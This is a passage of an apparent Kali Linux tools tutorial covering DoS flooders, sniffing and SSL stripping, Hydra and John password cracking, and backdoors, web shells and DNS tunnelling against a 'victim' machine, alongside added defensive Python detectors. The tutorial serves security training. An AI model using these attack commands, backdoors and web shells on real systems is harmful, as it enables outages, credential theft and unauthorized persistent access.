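    """Return {src: stalled_count} for clients that hold at least `min_conns`
    connections which are older than `min_age` seconds, still have incomplete
    request headers, and have sent fewer than `max_rate` bytes per second."""
    stalled = defaultdict(int)
    for c in conns:
        age = now - c.opened
        if c.headers_done or age < min_age:
            continue  # request finished, or connection too young to judge
        if c.bytes_in / age < max_rate:
            stalled[c.src] += 1
    return {src: n for src, n in stalled.items() if n >= min_conns}


def sample_snapshot():
    """Constructed snapshot taken at t=60 s; not captured traffic."""
    conns = []
    # One client holding 287 connections open, adding 24 bytes every 10 s.
    for i in range(287):
        conns.append(Conn("192.168.1.50", float(i % 3), False, 40 + 24 * 5))
    # Ordinary clients whose requests completed normally.
    for i in range(20):
        conns.append(Conn(f"192.168.1.{60 + i}", 58.0, True, 420))
    # One client on a bad link with a single stalled request.
    conns.append(Conn("192.168.1.90", 10.0, False, 100))
    return conns


if __name__ == "__main__":
    for src, n in slow_header_clients(sample_snapshot(), now=60.0).items():
        print(f"{src}: {n} stalled header-phase connections")
```

The per-client connection threshold is what separates the test client from the single slow connection of 192.168.1.90; the same idea underlies per-IP connection limits and header timeouts on the web server.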



inviteflood

Inviteflood is a tool that floods a target with SIP/SDP INVITE messages sent over UDP/IP. It works on various Linux distributions. It performs DoS (denial of service) attacks against SIP devices by sending multiple INVITE requests.


To open Inviteflood, first open a terminal and type “inviteflood –parameters”



 


 

For reference, you can use "inviteflood -h"



Next, you can use the following command -


inviteflood eth0 target_extension  target_domain target_ip number_of_packets

Where,


target_extension is 2000

target_domain is 192.168.xx

target_ip is 192.168.xx

number_of_packets is 1

-a is the SIP account alias



Iaxflood

Iaxflood is a DoS tool for VoIP. To open it, type "iaxflood sourcename destinationname numpackets" in a terminal.


To learn how to use, type "iaxflood -h"



thc-ssl-dos

THC-SSL-DOS is an SSL performance test tool. Establishing a secure SSL connection requires 15 times more processing power on the server than on the client. THC-SSL-DOS takes advantage of this asymmetry by overloading the server and disconnecting it from the Internet.


Following is the command -


thc-ssl-dos victimIP httpsport --accept

In this example it would be -


thc-ssl-dos 192.168.1.1 443 --accept

Its output will be as follows:



 The basic concept of sniffing tools is as simple as wiretapping, and Kali Linux has several popular tools for this purpose. In this chapter, we will learn about the sniffing and spoofing tools available in Kali.


Burpsuite

Burpsuite can be used as a sniffing tool between your browser and web servers to find the parameters a web application is using.


To open Burpsuite, go to Applications → Web Application Analysis → Burpsuite.



To set up sniffing, we configure burpsuite to act as a proxy. To do this, go to Options as shown in the following screenshot. Check the box as shown.


In this case, the proxy IP address will be 127.0.0.1 with port 8080.



Then set up a browser proxy, which is the burpsuite machine's IP address and port.



To start interception, go to Proxy → Intercept → click "Intercept is on".


Continue navigating the web page in which you want to find the parameter to test for vulnerabilities.



In this case, this is a Metasploitable machine with IP 192.168.1.102.



Go to HTTP History. In the following screenshot, the line marked with a red arrow shows the last request. In Raw, hidden parameters such as the session ID and other parameters such as username and password are underlined in red.



mitmproxy

mitmproxy is a man-in-the-middle HTTP proxy with SSL support. It provides a console interface that allows you to monitor and edit traffic flows on the fly.


To open it, go to the terminal and type “mitmproxy -parameter”, and for command help type “mitmproxy -h”.



To start mitmproxy, type “mitmproxy -p portnumber”. In this case it is "mitmproxy -p 80".



Wireshark

Wireshark is one of the best packet sniffers. It analyzes packets in depth at the frame level. You can get more information about Wireshark on its official webpage: https://www.wireshark.org/ . In Kali, it can be found in the following path - Applications → Sniffing & Spoofing → wireshark.



Once you click wireshark, the following GUI will open.



Click Start and packet capture will start as shown in the following screenshot.



sslstrip

sslstrip is a MITM attack tool that forces the victim's browser to exchange data in plain text over HTTP, while the proxy modifies the content coming from the HTTPS server. To do this, sslstrip "strips" https:// URLs and turns them into http:// URLs.


To open it go to Applications → 09-Sniffing & Spoofing → Spoofing and MITM → sslstrip.



To set it up, write a rule that redirects all port 80 traffic to port 8080.



Then run the sslstrip command on the required port.
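Because sslstrip depends on the browser accepting plain HTTP, the server-side defence is HSTS, Secure cookies and no http:// links back to the site itself. The following added example (not part of the original tutorial) audits one HTTPS response for those three points; the host shop.example, the 180-day threshold and both sample responses are constructed assumptions.

```python
import re
from urllib.parse import urlparse

MIN_MAX_AGE = 15552000  # 180 days in seconds; assumed policy threshold


def parse_hsts(value):
    """Parse a Strict-Transport-Security value into (max_age, include_subdomains)."""
    max_age, include_sub = None, False
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name = name.strip().lower()
        arg = arg.strip().strip('"')
        if name == "max-age" and arg.isdigit():
            max_age = int(arg)
        elif name == "includesubdomains":
            include_sub = True
    return max_age, include_sub


def audit_response(url, headers, body):
    """headers: list of (name, value) pairs from one HTTPS response."""
    findings = []
    host = urlparse(url).hostname
    hsts = [v for n, v in headers if n.lower() == "strict-transport-security"]
    if not hsts:
        findings.append("no HSTS header: browser will accept a downgrade to HTTP")
    else:
        max_age, include_sub = parse_hsts(hsts[0])
        if max_age is None or max_age < MIN_MAX_AGE:
            findings.append(f"HSTS max-age too short: {max_age}")
        if not include_sub:
            findings.append("HSTS lacks includeSubDomains")
    for n, v in headers:
        if n.lower() == "set-cookie":
            attrs = [a.strip().lower() for a in v.split(";")[1:]]
            if "secure" not in attrs:  # cookie would also be sent over stripped HTTP
                findings.append(f"cookie without Secure flag: {v.split('=', 1)[0]}")
    pattern = r'(?:href|action|src)\s*=\s*["\'](http://[^"\']+)'
    for link in re.findall(pattern, body, re.I):
        if urlparse(link).hostname == host:
            findings.append(f"plain-HTTP link to own host: {link}")
    return findings


# Constructed sample responses (url, headers, body).
WEAK = ("https://shop.example/",
        [("Strict-Transport-Security", "max-age=300"),
         ("Set-Cookie", "PHPSESSID=abc123; path=/; HttpOnly")],
        '<a href="http://other.example/">x</a>'
        '<form action="http://shop.example/login" method="post">')
HARDENED = ("https://shop.example/",
            [("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
             ("Set-Cookie", "PHPSESSID=abc123; Path=/; Secure; HttpOnly")],
            '<form action="/login" method="post">')

if __name__ == "__main__":
    for finding in audit_response(*WEAK):
        print(finding)
```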


 In this chapter, we will learn about important password cracking tools used in Kali Linux.


Hydra

Hydra is a login cracker that supports many protocols to attack (Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB (NT), SMTP, SMTP Enum, SNMP v1 + v2 + v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP).


To open it, go to Applications → Password Attacks → Online Attacks → Hydra.



The terminal console will open as shown in the following screenshot.



In this case, we will brute-force the FTP service of the Metasploitable machine with IP 192.168.1.101.



We have created a word list in Kali with the extension lst in the path /usr/share/wordlists/metasploit .



The command is as follows -


hydra -L /usr/share/wordlists/metasploit/user -P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 -V

where -L and -P give the username list and the password list, and -V shows each username and password as it is tried.



As shown in the following screenshot, the username and password found are msfadmin: msfadmin
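On the FTP server, a run like the one above appears as a burst of failed logins from one client, possibly ending in a success. The following added example (not part of the original tutorial) detects that pattern in log lines; the lines are constructed and modelled on the vsftpd log format, and the client addresses and thresholds are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<res>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')


def detect_bruteforce(lines, max_fail=5, window=60):
    """Return {ip: {"failures", "users", "success_after"}} for clients with at
    least `max_fail` failed logins inside any `window`-second interval."""
    recent = defaultdict(deque)  # ip -> timestamps of failures inside the window
    tried = defaultdict(set)     # ip -> usernames that failed
    alerts = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        ip, user = m["ip"], m["user"]
        if m["res"] == "FAIL":
            q = recent[ip]
            q.append(ts)
            tried[ip].add(user)
            while (ts - q[0]).total_seconds() > window:
                q.popleft()
            if len(q) >= max_fail:
                a = alerts.setdefault(
                    ip, {"failures": 0, "users": tried[ip], "success_after": None})
                a["failures"] = max(a["failures"], len(q))
        elif ip in alerts and alerts[ip]["success_after"] is None:
            # A success after the burst means a guess worked: reset that account.
            alerts[ip]["success_after"] = user
    return alerts


def sample_log():
    """Constructed log lines; not taken from a real server."""
    t0 = datetime(2024, 4, 19, 12, 0, 0)

    def entry(offset, user, result, ip):
        stamp = (t0 + timedelta(seconds=offset)).strftime("%a %b %d %H:%M:%S %Y")
        return f'{stamp} [pid 2101] [{user}] {result} LOGIN: Client "{ip}"'

    lines = [entry(0, "alice", "FAIL", "192.168.1.77"),   # a user's typo
             entry(9, "alice", "OK", "192.168.1.77")]
    guesses = ["root", "admin", "ftp", "user", "test", "service", "postgres", "msfadmin"]
    for i, user in enumerate(guesses):
        lines.append(entry(20 + i, user, "FAIL", "192.168.1.50"))
    lines.append(entry(29, "msfadmin", "OK", "192.168.1.50"))
    return lines


if __name__ == "__main__":
    for ip, a in detect_bruteforce(sample_log()).items():
        print(ip, a["failures"], sorted(a["users"]), a["success_after"])
```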



Johnny

Johnny is a GUI for the John the Ripper password cracking tool. It is usually used for weak passwords.


To open it, go to Applications → Password Attacks → Johnny.



In this case, we will get the password of the Kali machine with the following command and the file will be created on the desktop.



Click Open Password File → OK and all files will be shown as in the following screenshot.



Click "Start Attack".



Once the attack is complete, click "Passwords" in the left pane and the password will be shown unshaded.



John

john is the command line version of Johnny GUI. To run it, open Terminal and type "john" .



To unshadow the password file, we need to write the following command -


root@kali:~# unshadow passwd shadow > unshadowed.txt
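The unshadowed file is in passwd format with the hash in the second field, so the same file tells an administrator which accounts an offline cracker would recover first. The following added example (not part of the original tutorial) audits such a file by hash scheme; the sample lines and their hash strings are constructed placeholders, not real hashes.

```python
# crypt(3) scheme identifiers found between the first two "$" signs.
SCHEMES = {
    "1": ("md5crypt", "weak"),
    "2a": ("bcrypt", "ok"), "2b": ("bcrypt", "ok"), "2y": ("bcrypt", "ok"),
    "5": ("sha256crypt", "ok"),
    "6": ("sha512crypt", "ok"),
    "y": ("yescrypt", "ok"),
}


def classify(field):
    """Map the password field of an unshadowed line to (scheme, status)."""
    if field == "":
        return "empty password", "weak"
    if field == "x":
        return "hash not merged", "skip"   # plain /etc/passwd line
    if field[0] in "!*":
        return "locked", "skip"            # no password login possible
    if field.startswith("$"):
        return SCHEMES.get(field.split("$")[1], ("unknown scheme", "weak"))
    if len(field) == 13:
        return "descrypt", "weak"          # traditional DES crypt
    return "unrecognised", "weak"


def audit_unshadowed(text):
    """Return [(user, finding)] for accounts that need attention."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue  # not a passwd-format line
        user, pw, uid = fields[0], fields[1], fields[2]
        scheme, status = classify(pw)
        if status == "weak":
            findings.append((user, scheme))
        elif status == "ok" and uid == "0" and user != "root":
            findings.append((user, "extra UID 0 account"))
    return findings


# Constructed sample; every hash string below is a placeholder.
SAMPLE = """\
root:$6$CONSTRUCTED$notARealHash000000000000:0:0:root:/root:/bin/bash
msfadmin:$1$CONSTRUC$notARealHash0000000000:1000:1000:admin:/home/msfadmin:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
legacy:ab0123456789A:1001:1001::/home/legacy:/bin/sh
guest::1002:1002::/home/guest:/bin/sh
toor:$y$j9T$CONSTRUCTED$notARealHash:0:0::/root:/bin/bash
"""

if __name__ == "__main__":
    for user, finding in audit_unshadowed(SAMPLE):
        print(f"{user}: {finding}")
```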

RainbowCrack

RainbowCrack cracks hashes using a rainbow table lookup. Rainbow tables are regular files stored on a hard drive. Typically, Rainbow tables are purchased online or can be compiled using a variety of tools.


To open it, go to Applications → Password Attacks → click on "rainbowcrack".



Command to crack password hash -


rcrack path_to_rainbow_tables -f path_to_password_hash

SQLdict

It is a dictionary attack tool for SQL server which is very simple and easy to use. To open it, open a terminal and type "sqldict" . The following view will open.



In the Destination IP Server section, enter the IP address of the server hosting SQL. In the Target Account section, enter your username. Then upload the password file and click start until it finishes.


hash-identifier

It is a tool that is used to identify the type of a hash, i.e. what it is used for. For example, if I have a hash, it can tell me whether it is a Linux or Windows hash.



The screen above shows that it could be an MD5 hash, and it also looks like Domain Cached Credentials.


 In this chapter, we will see the tools that Kali uses to maintain a connection and to access a compromised machine even when it reconnects and disconnects.


Powersploit

This is a tool designed for Windows computers. PowerShell is installed on the victim's computer. This tool helps the hacker to connect to the victim's machine via PowerShell.


To open it, open a terminal on the left and type the following command to enter the powersploit folder -


cd /usr/share/powersploit/

If you type "ls" it will list all the powersploit tools that you can download and install on the victim's machine after gaining access. Most of them are self-explanatory according to their names.



An easy way to download these tools on the victim's machine is to serve the folder from a web server, which is easy to create with the following command:


python -m SimpleHTTPServer


After that, if you type http://<ip_address of the Kali machine>:8000/ in a browser, you will see the following result.



Sbd

sbd is a tool similar to Netcat. It is portable and can be used on Linux and Microsoft machines. sbd features AES-CBC-128 + HMAC-SHA1 encryption. Essentially, it helps to connect to the victim's machine at any time through a specific port and send commands remotely.


To open it, go to the terminal and type "sbd -l -p port" to make the server accept connections.



In this case, let's put port 44 on which the server will listen.



On the victim's side, enter "sbd IPofserver port". A connection will be established over which we can send remote commands.


In this case, it's "localhost" because we're testing on the same machine.



Finally, on the server, you will see that the connection has taken place, as shown in the following screenshot.



Web shells

Web shells can be used to maintain access or hack a website. But most of them are detected by antiviruses. The C99 php shell is very well known among antiviruses. Any common antivirus will easily recognize it as malware.


Typically, their main function is to send system commands through web interfaces.



 

To open it, type “cd /usr/share/webshells/” in a terminal.



As you can see, they are divided into classes according to the programming language: asp, aspx, cfm, jsp, perl, php.


If you go into the PHP folder you will see all the web shells for PHP web pages.



To upload a shell to a web server, such as “simple-backdoor.php”, open the web page and the URL of the web shell.


At the end, write the cmd command. You will have all the information shown in the following screenshot.



Weevely

Weevely is a PHP web shell that mimics a telnet-like connection. It is a web application post-exploitation tool that can be used as a hidden backdoor or as a web shell to manage legitimate web accounts, even free hosted ones.


To open it go to the terminal and type "weevely" to see its usage.



To generate a shell, type “weevely generate password pathoffile” . As seen in the following screenshot, it is created in the Desktop folder and the file must be uploaded to the web server in order to be accessed.



After loading the web shell as shown in the following screenshot, we can connect with cmd to the server using the “weevely URL password” command where we can see that the session has started.



http-tunnel

http-tunnel creates a bi-directional virtual data stream that is tunneled in HTTP requests. Optionally, requests can be sent through an HTTP proxy. This can be useful for users behind restrictive firewalls. If access to the WWW is allowed through an HTTP proxy, you can use http-tunnel and telnet or PPP to connect to a computer outside the firewall.


First, we have to create a tunnel server with the following command -


httptunnel_server -h

Then on the client side type "httptunnel_client -h" and both will start accepting connections.


dns2tcp

This is again a tunneling tool that helps to pass TCP traffic through DNS traffic, which means UDP port 53.


To run it, type "dns2tcpd" . Usage is explained when you open the script.



On the server side, enter these commands to create the configuration file and start the daemon.


# cat >>.dns2tcpdrc <<END
listen = 0.0.0.0
port = 53
user = nobody
chroot = /root/dns2tcp
pid_file = /var/run/dns2tcp.pid
domain = your domain
key = secretkey
resources = ssh:127.0.0.1:22
END

# dns2tcpd -f .dns2tcpdrc

On the client side, enter these commands.


# cat >>.dns2tcprc <<END
domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END

# dns2tcpc -f .dns2tcprc

# ssh root@localhost -p 7891 -D 7076

Tunneling will start with this command.
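On the network's resolver, a tunnel like the one configured above shows up as a stream of long, unique, encoded subdomains under a single domain. The following added example (not part of the original tutorial) flags such domains in a DNS query log; the log format, thresholds, domain names and sample queries are constructed assumptions, and the encoded labels are generated only to imitate tunnel-like names.

```python
import base64
import hashlib
import math
from collections import Counter, defaultdict


def entropy(s):
    """Shannon entropy of a string in bits per character."""
    return -sum(n / len(s) * math.log2(n / len(s)) for n in Counter(s).values())


def split_name(qname, zone_labels=2):
    """Split a query name into (subdomain, zone); zone = last `zone_labels` labels."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-zone_labels]), ".".join(labels[-zone_labels:])


def detect_tunnels(queries, min_unique=50, min_len=30, min_entropy=3.5):
    """queries: iterable of (client_ip, qtype, qname).
    Flags zones that receive many distinct, long, high-entropy subdomains."""
    zones = defaultdict(lambda: {"subs": set(), "clients": set(), "types": Counter()})
    for client, qtype, qname in queries:
        sub, zone = split_name(qname)
        if not sub:
            continue  # query for the zone itself carries no data
        z = zones[zone]
        z["subs"].add(sub)
        z["clients"].add(client)
        z["types"][qtype] += 1
    flagged = {}
    for zone, z in zones.items():
        subs = [s.replace(".", "") for s in z["subs"]]
        mean_len = sum(map(len, subs)) / len(subs)
        mean_ent = sum(map(entropy, subs)) / len(subs)
        if len(subs) >= min_unique and mean_len >= min_len and mean_ent >= min_entropy:
            flagged[zone] = {"unique": len(subs), "mean_len": round(mean_len, 1),
                             "mean_entropy": round(mean_ent, 2),
                             "clients": sorted(z["clients"]),
                             "types": dict(z["types"])}
    return flagged


def sample_queries():
    """Constructed query log: ordinary lookups plus one client sending encoded labels."""
    queries = []
    for i in range(300):
        host = ["www", "mail", "cdn"][i % 3]
        queries.append(("192.168.1.20", "A", f"{host}.corp.example"))
    for i in range(200):
        digest = hashlib.sha256(str(i).encode()).digest()[:20]
        label = base64.b32encode(digest).decode().lower()  # 32 characters
        queries.append(("192.168.1.50", "TXT", f"{label}.tunnel.test"))
    return queries


if __name__ == "__main__":
    for zone, info in detect_tunnels(sample_queries()).items():
        print(zone, info)
```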


cryptcat

This is another tool like Netcat that allows you to establish a TCP and UDP connection to the victim's machine in encrypted form.


To start the server to listen for a connection, type the following command -


cryptcat -l -p port -n


Where,


-l means listen for a connection


-p stands for port number option


-n means no name resolution


On the client side, the connection command is “cryptcat IPofServer PortofServer”


 In this chapter, we will learn about Kali Linux reverse engineering tools.


OllyDbg

OllyDbg is a 32-bit assembler-level analysis debugger for Microsoft Windows applications. The emphasis on binary code analysis makes it especially useful in cases where the source code is not available. Typically, it is used to crack commercial software.


To open it go to Applications → Reverse Engineering → ollydbg.



To load an EXE file, click the yellow "Open folder" icon, which is shown in the red square in the screenshot above.


Once loaded, you will have the following view where you can modify the binaries.



dex2jar

This is an application that helps to convert an APK (Android) file to a JAR file in order to view the source code. To use it, open a terminal and type “d2j-dex2jar -d /file location”.


In this case, the “classes.dex” file is on the desktop.



The next line shows that the JAR file has been created.



jd-gui

JD-GUI is a standalone graphical utility that displays the Java source code of “.class” files. You can view the restored source code. In this case, we can restore the file extracted with the dex2jar tool.


To run it, open a terminal and type “jd-gui” and the following view will open.



 

To import a file, click the open folder icon in the upper left corner and then import the file.



apktool

Apktool is one of the best tools for modifying a whole Android application. It can decode resources to near-original form and rebuild them after changes have been made.


To open it go to the terminal and type “apktool” .


 

To decompile an apk file write "apktool d apk file" .



Decompilation will start as shown in the following screenshot.

 In this chapter, we will learn about some of the reporting tools in Kali Linux.


Dradis

In all this work that we have done, it is important to share the results obtained, track our work, etc. For this purpose, Kali has a reporting tool called dradis, which is a web service.


Step 1 - To start Dradis, type “service dradis start” .



Step 2 - To open, go to Applications → Reporting Tools → dradis.



The web address will open. Anyone on the local network can open it with the following URL: https://<Kali machine's IP>:3004


Log in with the username and password you set the first time you used it.



Step 3 - After logging in, you can import files from NMAP, NESSUS, NEXPOSE. To do this, go to "Import from File" → click on "New Importer (with real-time feedback)".



Step 4 - Select the file type you want to upload. In this case, it's "Nessus scan" → click "Browse".



If you go to the homepage now, you will see in the left pane that the imported scan results are in a folder with their host and port data.



Metagoofil

Metagoofil searches Google to identify and download documents to a local drive, and then extracts the metadata. It extracts metadata from public documents owned by a particular company, individual, entity, etc.


To open it, go to the path “/usr/share/metagoofil/”.



To start searching, enter the following command -


python metagoofil.py

You can use the following options with this command -


-d (domain name)

-t (file type to download: doc, pdf, etc.)

-l (limit results to 10, 100)

-n (limit the number of files to download)

-o (location to save files)

-f (output file)


The following example shows that only the domain name is hidden.



Hope you enjoyed the article!😊